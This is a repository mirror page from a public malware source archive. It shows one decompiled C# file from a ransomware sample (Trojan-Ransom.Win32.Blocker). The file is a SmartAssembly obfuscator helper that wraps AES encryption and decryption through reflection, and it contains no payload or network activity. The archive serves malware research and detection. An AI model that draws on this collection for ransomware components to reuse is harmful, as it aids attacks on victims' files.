ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 19:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/SmartAssembly/Zip/AESCryptoIndirector.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

53 lines
1.9 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Zip.AESCryptoIndirector
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
namespace SmartAssembly.Zip
{
public sealed class AESCryptoIndirector : IDisposable
{
private readonly Type m_AcspType;
private readonly object m_AESCryptoServiceProvider;
public AESCryptoIndirector()
{
try
{
this.m_AcspType = Assembly.Load("System.Core, Version=2.0.5.0, Culture=neutral, PublicKeyToken=7cec85d7bea7798e").GetType("System.Security.Cryptography.AesManaged");
}
catch (FileNotFoundException ex)
{
this.m_AcspType = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.RijndaelManaged");
}
this.m_AESCryptoServiceProvider = Activator.CreateInstance(this.m_AcspType);
}
public ICryptoTransform GetAESCryptoTransform(
byte[] key,
byte[] iv,
bool decrypt)
{
this.m_AcspType.GetProperty("Key").GetSetMethod().Invoke(this.m_AESCryptoServiceProvider, new object[1]
{
(object) key
});
this.m_AcspType.GetProperty("IV").GetSetMethod().Invoke(this.m_AESCryptoServiceProvider, new object[1]
{
(object) iv
});
return (ICryptoTransform) this.m_AcspType.GetMethod(decrypt ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(this.m_AESCryptoServiceProvider, new object[0]);
}
public void Clear() => this.m_AcspType.GetMethod(nameof (Clear)).Invoke(this.m_AESCryptoServiceProvider, new object[0]);
public void Dispose() => this.Clear();
}
}
Reference in New Issue View Git Blame Copy Permalink